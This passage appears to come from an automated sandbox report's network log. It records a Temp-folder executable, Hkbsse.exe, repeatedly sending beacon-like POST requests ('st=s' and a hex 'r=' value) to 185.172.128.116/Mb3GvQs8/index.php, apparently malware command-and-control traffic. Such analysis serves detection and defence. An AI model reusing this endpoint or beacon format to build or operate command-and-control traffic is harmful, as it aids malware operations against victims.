                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:17.683183908 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:17 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:17.688515902 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:17.890700102 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:17 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        81192.168.2.559053185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:18.005211115 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:18.638343096 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:18 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:18.639405966 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:18.834745884 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:18 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        82192.168.2.559054185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:18.957976103 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:19.591934919 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:19 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:19.599723101 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:19.804157019 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:19 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        83192.168.2.559055185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:19.978974104 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:20.921730995 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:20 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:20.922535896 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:20 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:20.922986984 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:21.115554094 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:21 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        84192.168.2.559056185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:21.235841036 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:21.874716997 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:21 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:21.878009081 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:22.067929983 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:21 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        85192.168.2.559057185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:22.194253922 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:22.835108042 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:22 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:22.836148024 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:23.028994083 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:22 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        86192.168.2.559058185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:23.148106098 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:23.797792912 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:23 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:23.804516077 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:23.998999119 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:23 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        87192.168.2.559059185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:24.111618042 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:24.753762960 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:24 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:24.754945993 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:24.955394030 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:24 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        88192.168.2.559060185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:25.067167044 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:25.729792118 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:25 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:25.734278917 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:25.931571960 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:25 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
